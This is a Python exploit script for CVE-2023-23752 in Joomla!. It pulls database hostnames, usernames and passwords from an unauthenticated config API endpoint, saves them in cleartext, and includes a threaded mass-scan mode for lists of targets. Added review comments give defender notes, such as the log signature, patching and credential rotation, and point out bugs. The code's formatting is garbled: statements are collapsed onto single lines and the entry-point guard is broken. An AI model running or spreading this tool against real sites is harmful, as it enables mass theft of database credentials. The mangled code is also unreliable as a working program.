以下是优化后的代码:

Author: Pari Malam

import requests import sys import os import re import colorama import urllib3 from sys import stdout from colorama import Fore, Style, Back, init from concurrent.futures import ThreadPoolExecutor, as_completed

# Enable colorama with automatic style reset after each print, and silence
# urllib3's InsecureRequestWarning.
# NOTE(review): the suppressed warning pairs with the verify=False requests
# further down. With certificate checks off, a response cannot be tied to the
# intended host, so any finding should be re-confirmed over a verified
# connection before it is reported.
init(autoreset=True) delete_warning = urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Output directory for findings. Results/live.txt, written later in this file,
# holds database credentials in cleartext, so the directory needs the same
# access control and retention handling as any other secret store.
if not os.path.exists('Results'): os.mkdir('Results')

# Clear the terminal ('clear' on POSIX, 'cls' otherwise) and print the banner
# naming CVE-2023-23752.
def banners(): os.system('clear' if os.name == 'posix' else 'cls') print(f"{Fore.YELLOW}[CVE-2023-23752] - {Fore.GREEN}Authentication Bypass Information Leak on Joomla!")

# Module-level call: the banner is shown before any prompt.
banners()

# Check one host for exposure to CVE-2023-23752.
#
# Prompts for the target when url is None, prepends http:// when no scheme is
# given, then requests /api/index.php/v1/config/application?public=true
# without credentials. A 200 response whose body contains "dbtype" is treated
# as a positive finding.
#
# Returns (decoded_body, True) on a finding and ('', False) otherwise.
#
# Defender notes:
#  - A positive means the site's database settings, including the password,
#    are readable without authentication. Updating Joomla! to a release that
#    fixes CVE-2023-23752 closes the endpoint, but credentials that were
#    already readable should be rotated as well.
#  - In web access logs the check shows up as an unauthenticated GET to the
#    path above carrying public=true.
def scan_single_url(url=None): if url is None: url = input(f"\n{Fore.YELLOW}IP/Domain: {Fore.RESET}")

if not url.startswith('https://') and not url.startswith('http://'):
    full_url = 'http://' + url
else:
    full_url = url

print(f"\n{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.GREEN}[Scanning!]")
try:
    # These headers are attached only to the first request below; the request
    # to the config endpoint is sent without them (library defaults apply).
    headers = {
        "Host": url,
        "content-type": "application/vnd.api+json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
    }
    # The result of this request is never read; an exception raised here
    # jumps to the handler below and the endpoint check is skipped.
    response = requests.get(full_url, headers=headers, verify=False, timeout=10)
    config_url = full_url + '/api/index.php/v1/config/application?public=true' #/api/index.php/v1/users?public=true
    config_response = requests.get(config_url, verify=False)
    if config_response.status_code == 200 and b'dbtype' in config_response.content:
        decoded_content = config_response.content.decode()
        if 'dbtype' in decoded_content:
            # Fields are pulled out of the body with regexes; [0] raises
            # IndexError when a key is absent, which the broad handler below
            # reports as a generic failure.
            dbtype = re.findall('"dbtype":"(.*?)"', decoded_content)[0]
            dbprefix = re.findall('"dbprefix":"(.*?)"', decoded_content)[0]
            host = re.findall('"host":"(.*?)"', decoded_content)[0]
            db = re.findall('"db":"(.*?)"', decoded_content)[0]
            user = re.findall('"user":"(.*?)"', decoded_content)[0]
            password = re.findall('"password":"(.*?)"', decoded_content)[0]

            # NOTE(review): every value printed here is taken from the remote
            # response and reaches the terminal unescaped, so the remote server
            # controls what is displayed. The password is shown in cleartext.
            print(f"{Fore.YELLOW}\n[+] Domain            : {Fore.GREEN}{url}")
            print(f"{Fore.YELLOW}[+] Database Type     : {Fore.GREEN}{dbtype}")
            print(f"{Fore.YELLOW}[+] Database Prefix   : {Fore.GREEN}{dbprefix}")
            print(f"{Fore.YELLOW}[+] Database          : {Fore.GREEN}{db}")
            print(f"{Fore.YELLOW}[+] Hostname          : {Fore.GREEN}{host}")
            print(f"{Fore.YELLOW}[+] Username          : {Fore.GREEN}{user}")
            print(f"{Fore.YELLOW}[+] Password          : {Fore.GREEN}{password}\n")
            
            # Only findings with a non-loopback database host are appended to
            # Results/live.txt. The record includes the password in cleartext
            # and the file is opened with default permissions.
            if host != "localhost" and host != "127.0.0.1":
                with open('Results/live.txt', 'a') as f:
                    f.write(f"[+] {url}\nDatabase Type     : {dbtype}\nDatabase Prefix   : {dbprefix}\nHostname          : {host}\nDatabase          : {db}\nUsername          : {user}\nPassword          : {password}\n\n")

            return decoded_content, True
# Broad handler: connection errors, decode errors and missing fields all end
# up here and print the same message; the exception itself is discarded.
except Exception as e:
    print(f"{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[Failed!]")

# Reached when the marker was not found or an exception was handled above.
return '', False

# Read targets, one per line, from a file named at the prompt and run
# scan_single_url on each through a pool of 10 worker threads.
#
# Returns the list of targets after the http:// prefix has been applied.
def scan_multiple_urls(): url_list = input(f"\n{Fore.RED}[+] {Fore.YELLOW}IP/DOMAIN List: {Fore.RESET}") urls = []

# Repeats the directory check already made at module level.
if not os.path.exists("Results"):
    os.makedirs("Results")
    
with open(url_list, "r") as f:
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = []
        for url in f:
            url = url.strip()
            if not url.startswith('https://') and not url.startswith('http://'):
                url = 'http://' + url

            # NOTE(review): a scheme has already been prepended at this point
            # and re.match anchors at the start of the string, so the IP
            # branch looks unreachable (TODO confirm). The file name is built
            # from the input line without sanitising path separators.
            if re.match(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b", url):
                url_file_name = f"Results/IPs_{url}.txt"
            else:
                url_file_name = re.sub(r"https?://", "", url).rstrip("/") + ".txt"

            url_file_path = f"Results/{url_file_name}"
            futures.append(executor.submit(scan_single_url, url.strip()))

            urls.append(url)

        # NOTE(review): the futures carry no reference to their target. Below,
        # url and url_file_path still hold whatever the submit loop assigned
        # last, so messages and saved files can be attributed to the wrong
        # host. Anyone reading this tool's output should treat the host label
        # on these records as unreliable.
        for future in as_completed(futures):
            response, sensitive_matches = future.result()
            if sensitive_matches:
                decoded_content = response
                # Same regex extraction as in scan_single_url, repeated on the
                # body it returned.
                dbtype = re.findall('"dbtype":"(.*?)"', decoded_content)[0]
                dbprefix = re.findall('"dbprefix":"(.*?)"', decoded_content)[0]
                host = re.findall('"host":"(.*?)"', decoded_content)[0]
                db = re.findall('"db":"(.*?)"', decoded_content)[0]
                user = re.findall('"user":"(.*?)"', decoded_content)[0]
                password = re.findall('"password":"(.*?)"', decoded_content)[0]
                
                # scan_single_url has already appended this finding to
                # Results/live.txt, so the record is written a second time.
                if host != "localhost" and host != "127.0.0.1":
                    with open('Results/live.txt', 'a') as f:
                        f.write(f"[+] {url}\nDatabase Type     : {dbtype}\nDatabase Prefix   : {dbprefix}\nHostname          : {host}\nDatabase          : {db}\nUsername          : {user}\nPassword          : {password}\n\n")

                    # Stores the complete response body, credentials included,
                    # in cleartext; "w" overwrites any earlier file at the path.
                    with open(url_file_path, "w", encoding="utf-8") as f:
                        f.write(decoded_content)
            # scan_single_url returns '' whenever the flag is False, so this
            # branch looks unreachable and every non-finding prints [Error!].
            elif response:
                print(f"{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[No Sensitive Information!]")
            else:
                print(f"{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[Error!]")
        
return urls

# Interactive entry point: reads a menu choice, where '1' calls
# scan_single_url() (which prompts for the target) and '2' calls
# scan_multiple_urls(); any other input prints an error message.
# NOTE(review): the guard and the final print call appear to have been damaged
# when the page was extracted (the guard's underscores and the closing
# parenthesis are missing).
if name == 'main': choice = input(f"\n{Fore.RED}[1] - {Fore.YELLOW}Single Scan\n{Fore.RED}[2] - {Fore.YELLOW}Massive Scan\n\n{Fore.YELLOW}[CVE-2023-23752]: {Fore.WHITE}") if choice == '1': response, sensitive_matches = scan_single_url() elif choice == '2': scan_multiple_urls() else: print(f"\n{Fore.RED}Invalid option selected"

